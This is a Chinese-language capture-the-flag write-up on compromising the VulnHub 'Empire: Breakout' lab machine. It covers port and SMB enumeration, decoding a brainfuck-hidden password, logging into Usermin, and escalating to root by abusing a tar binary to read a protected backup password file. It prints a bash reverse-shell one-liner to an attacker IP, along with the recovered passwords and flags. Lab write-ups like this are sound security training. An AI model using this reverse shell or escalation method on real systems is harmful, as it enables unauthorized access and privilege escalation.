一、靶机地址

靶机地址：Empire: Breakout ~ VulnHub

靶机介绍：

该靶机被定义为简单，但是如果没有找到，那就难度成中等了！

二、渗透过程

老三样，发现目标，这里用 arp-scan

确定靶机 ip：192.168.56.154，本机 ip：192.168.56.14，利用 nmap 探测靶机开放端口

开放 80、139、445、10000、20000，那就一个一个来，80 探测目录，查看主页 

没得东西，换个 gobuster

也没得东西，访问，啥玩意没有，陷入僵局，查看源代码，可以直接理由页面查看，也可以用 curl

利用，curl 请求网页

一不小心，在最下面，不讲武德，发现了一串串小东西，ctf 里面的 brainfuck 加密

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

CTF在线工具-在线Brainfuck加密|在线Brainfuck解密|Brainfuck|Brainfuck原理|Brainfuck算法

.2uqPEfj3D<P'a-3    #解密出来是这个，一串密码

访问 10000 和 20000，需要 ssl，那就上 https

 两个界面，一个 webmin，一个 usermin

 现在有密码，没有用户，回想之前开放端口，有 smb

那就枚举一下用户   enum4linux -a 192.168.56.154 

发现了 local user  cyber，登录 20000 的系统，是个邮箱，页面中找到了有终端，奈斯～

浅浅的查看一下，发现 user.txt，获取 flag1

3mp!r3{You_Manage_To_Break_To_My_Secure_Access} 

弹个 shell 到 kali 上 

bash -i >& /dev/tcp/192.168.56.146/1234 0>&1 

刚才还看到了个 tar 压缩程序，为毛会出现在这，肯定后面会用到 

去这个站底下瞅瞅，发现了 backups，备份哈，肯定有密码之类的东西 

这不是，它就来了，可惜了，权限不够啊 

换个思路，用刚才的那个 tar 压缩个包，然后重新解压一下，那个权限不就有了么，大聪明！哈哈

这里一定要在根目录下利用./tar 这样用，不然，这个机器上的 bin 目录里面肯定还有个 tar，会达不到想要的效果，然后再解压一下下，轻松愉快读取密码 

Ts&4&YurgtRX(=~h    #还怪长呢，直接su，输入密码，提权为 root

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} 

 欧克，flag2 获取，渗透结束，轻松愉快～

三、思路总结

1、好好的信息收集，收集不仔细，思路就没得了

2、常用思路，发现目标，探测目标开放服务，收集目录，找到能执行命令或者上传的地方

3、获取 shell 后，提权不一定需要内核漏洞或者其他什么方式，最顶级的食材往往仅需简单的烹饪～，能够找到密码，就很舒服了

4、继续努力！